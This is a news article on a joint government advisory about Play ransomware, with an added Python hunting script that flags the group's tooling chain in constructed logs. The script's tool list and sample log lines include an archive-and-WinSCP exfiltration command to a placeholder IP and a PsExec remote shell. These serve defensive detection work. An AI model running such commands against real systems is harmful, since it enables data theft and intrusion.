The Play ransomware has targeted nearly 300 organizations, including private companies and critical infrastructure in the US, Europe and South America, the FBI, CISA and Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) have warned.
The three agencies have published a joint security advisory detailing Indicators of Compromise (IoCs) and tactics, techniques, and procedures (TTPs) observed in Play ransomware attacks. The advisory notes that in Australia the first Play ransomware incident was observed in April 2023, and the most recent in November 2023.
The Play ransomware operation employs a double-extortion model, encrypting systems after exfiltrating data. The hackers gain initial access to victim networks via valid accounts and exploitation of known vulnerabilities, including FortiOS flaws (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell CVE-2022-41040 and CVE-2022-41082) vulnerabilities. Play ransomware actors have been observed to use external-facing services such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.
In December 2022, Play was observed using a new exploit chain (OWASSRF) to bypass ProxyNotShell mitigations to achieve remote code execution on vulnerable servers through Outlook Web Access (OWA).
The group uses multiple tools to evade detection and disable anti-virus products (AdFind and Grixba, GMER, IOBit, and PowerTool), and to move laterally within the victim network (Cobalt Strike, SystemBC, PsExec, and Mimikatz).
Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files into .RAR format for exfiltration. The actors then use WinSCP to transfer data from a compromised network to accounts under their control.
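The tooling and staging pattern in the two paragraphs above (known discovery, defence-evasion and lateral-movement utilities, then WinRAR archives split into volumes and handed to WinSCP) is something a defender can hunt for in process-creation telemetry. The script below is an added example written for this article, not code from the advisory or from the agencies that issued it. The pipe-delimited log layout, the host names, the IP address and every log line are constructed for illustration, and the mapping of tool names to categories is this example's own reading of the text.

```python
"""
Added example: flag the Play-style tooling chain in constructed process-creation logs.

Log format (an assumption for this example): timestamp|host|image_path|command_line
"""
import re
from dataclasses import dataclass

# Tool names are the ones the article lists; the category grouping is an assumption.
TOOL_SIGNATURES = {
    "discovery_or_defence_evasion": ("adfind.exe", "grixba", "gmer.exe", "iobit", "powertool"),
    "lateral_movement": ("cobaltstrike", "systembc", "psexec.exe", "mimikatz.exe"),
    "staging": ("rar.exe", "winrar.exe"),
    "exfiltration": ("winscp.exe",),
}

# WinRAR's -v<size> switch splits an archive into volumes, matching the
# "split compromised data into segments" behaviour described in the article.
SPLIT_VOLUME_RE = re.compile(r"\s-v\d+[kmg]?\b")

# Constructed sample telemetry (hosts, paths and 203.0.113.10 are made up).
SAMPLE_LOGS = r"""
2023-11-02T03:14:07Z|WS-042|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
2023-11-02T03:20:11Z|WS-042|C:\Tools\AdFind.exe|AdFind.exe -f objectcategory=computer
2023-11-02T03:41:55Z|FS-01|C:\Program Files\WinRAR\Rar.exe|Rar.exe a -v500m D:\stage\dump.rar D:\Finance
2023-11-02T03:58:30Z|FS-01|C:\Users\Public\winscp.exe|winscp.exe /command "open sftp://user@203.0.113.10" "put D:\stage\dump.part1.rar"
2023-11-02T04:02:00Z|WS-042|C:\Windows\System32\notepad.exe|notepad.exe report.txt
2023-11-02T04:10:12Z|DC-01|C:\Temp\PsExec.exe|PsExec.exe \\FS-01 -s cmd.exe
"""


@dataclass
class Finding:
    line_no: int
    host: str
    category: str
    image: str


def parse_line(line: str) -> dict:
    """Split one pipe-delimited record into its four fields."""
    ts, host, image, cmdline = line.split("|", 3)
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}


def classify(event: dict) -> list:
    """Return every category a single process-creation event matches."""
    image = event["image"].lower()
    cmd = event["cmdline"].lower()
    hits = []
    for category, names in TOOL_SIGNATURES.items():
        if any(name in image or name in cmd for name in names):
            hits.append(category)
    # A RAR invocation with a volume-size switch is the staging step worth singling out.
    if "rar" in image and SPLIT_VOLUME_RE.search(cmd):
        hits.append("staging_split_volumes")
    return hits


def scan(log_text: str) -> list:
    """Run the classifier over every line and collect findings."""
    findings = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        event = parse_line(line)
        for category in classify(event):
            findings.append(Finding(n, event["host"], category, event["image"]))
    return findings


def hosts_with_staging_and_exfil(findings: list) -> list:
    """Hosts that both built split archives and ran WinSCP: the pairing the article describes."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.category)
    return sorted(
        host for host, cats in by_host.items()
        if "staging_split_volumes" in cats and "exfiltration" in cats
    )


if __name__ == "__main__":
    results = scan(SAMPLE_LOGS)
    for f in results:
        print(f"line {f.line_no:2d}  {f.host:6s}  {f.category:28s}  {f.image}")
    print("staging + exfiltration on:", hosts_with_staging_and_exfil(results))
```

Substring matching on binary names is deliberately loose (renamed binaries will slip past it), so in practice this kind of rule is a starting point for hunting rather than a blocking control; the useful signal is the combination of a split-volume archive and an outbound transfer tool on the same host within a short window, which is why `hosts_with_staging_and_exfil` correlates by host rather than alerting on each tool in isolation.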
According to a November report from Adlumin researchers, operators behind the Play ransomware are now offering the malware under the Ransomware-as-a-Service business model.
Organizations are strongly advised to adhere to cybersecurity best practices such as regularly patching and updating software and applications, as well as enabling multifactor authentication (MFA) for all services to the extent possible to prevent Play ransomware attacks.